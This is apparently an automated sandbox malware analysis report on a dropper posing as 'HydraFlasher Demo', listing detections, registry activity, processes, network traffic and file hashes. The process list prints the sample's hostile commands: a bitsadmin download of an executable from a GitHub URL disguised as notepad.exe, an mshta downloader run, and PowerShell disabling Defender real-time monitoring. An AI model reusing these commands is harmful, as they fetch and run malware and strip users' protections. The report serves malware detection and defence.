Malware Analysis Report

2024-10-16 05:07

Sample ID 240728-xng9dayfll
Target HydraFlasher Demo V-5.6.exe
SHA256 536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0
Tags
discovery dropper execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0

Threat Level: Likely malicious

The file HydraFlasher Demo V-5.6.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery dropper execution

Download via BitsAdmin

.NET Reactor proctector

Checks computer location settings

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Modifies registry class

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-28 18:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 18:59

Reported

2024-07-28 19:02

Platform

win10v2004-20240709-en

Max time kernel

50s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
N/A N/A C:\Users\Admin\HydraFlasher Demo.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\HydraFlasher Demo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe

"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Users\Admin\HydraFlasher Demo.exe

"C:\Users\Admin\HydraFlasher Demo.exe"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/sleeper-cell/security/releases/download/dllhost/xvchosts.exe C:\Users\Admin\AppData\Roaming\notepad.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ExecutionPolicy Bypass -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.blockchain.com/btc/address/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd61646f8,0x7ffdd6164708,0x7ffdd6164718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.blockchain.com udp
US 104.17.11.85:443 www.blockchain.com tcp
US 104.17.11.85:443 www.blockchain.com tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 coinzillatag.com udp
US 104.21.69.73:443 coinzillatag.com tcp
US 8.8.8.8:53 85.11.17.104.in-addr.arpa udp
FR 172.217.18.200:443 ssl.google-analytics.com tcp
US 104.21.69.73:443 coinzillatag.com tcp
FR 172.217.18.200:443 ssl.google-analytics.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe

MD5 154e7c4941e5c99f6fe369ff90dc8370
SHA1 d155c4fcccc60ae26291fd1177780b3591ccbb49
SHA256 ff295bc05708762ae2fc54195c8785708291219e6d07ec52077980049e1f3d24
SHA512 c37427cae52c78d95829b690113a5dab7c4a859a7d2c8781bd1580c9af24b6a7eb53d0d3bdaf87aa505035f2620e36e5688ea5da90eb7c16203a7bea634c544d

C:\Users\Admin\HydraFlasher Demo.exe

MD5 ac70d7032b72fb148ac74a0b902de461
SHA1 c3fe932e0e5f672b1dedd5309087f7e7d165c683
SHA256 a672ed87b2f51e8f549194b1e2bdfcd8b3d3326bc60f2eb8e76ab7f4422a5c63
SHA512 f840046e0192605aacd9e428bb46fffd53bc39c7f0ce04ccb5ba81df35cee36a6fffc7cbd6ad51e89eea3cbbc3687951a3baf8de662c4068cc026dba62a44b8a

C:\Users\Admin\Downloader.hta

MD5 2dc6046e1cd218ba1ae101c6a96cb1ea
SHA1 26f057f84ca50739d3be3bdb022906b296364744
SHA256 012954762478b91e47a668255ce82791a4078761b18aaa74fc4e4c7168214cc8
SHA512 49f202b82a9561022b5b1299bbb2fcbda7ac89de6b8cfe7d5ba68ba08002b0cdefa93642128c08b217741644245fa2f550581bb4107676a592d615cdcdaa9179

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apebtnye.ubp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 54aadd2d8ec66e446f1edb466b99ba8d
SHA1 a94f02b035dc918d8d9a46e6886413f15be5bff0
SHA256 1971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e
SHA512 7e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994

\??\pipe\LOCAL\crashpad_3532_XUJIWUYPWRVMKRJZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 2f842025e22e522658c640cfc7edc529
SHA1 4c2b24b02709acdd159f1b9bbeb396e52af27033
SHA256 1191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e
SHA512 6e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b056dc60bb476d9ac65ad76c9c778f45
SHA1 cd4943b47e697b7c773448580573d6292e7ef1eb
SHA256 9a06a7cd0edcaf9ad4669bdfc3bf4bac6399f80a22d2cf6884da8e166c02383d
SHA512 5d4e75dac237f3b1950cfccc48e18cfb4b13a1e553be0160373462a2321160ca2448fbce398a562839a84d86634783ed6e577adaee4d15e1a1b85d7b9d7e985c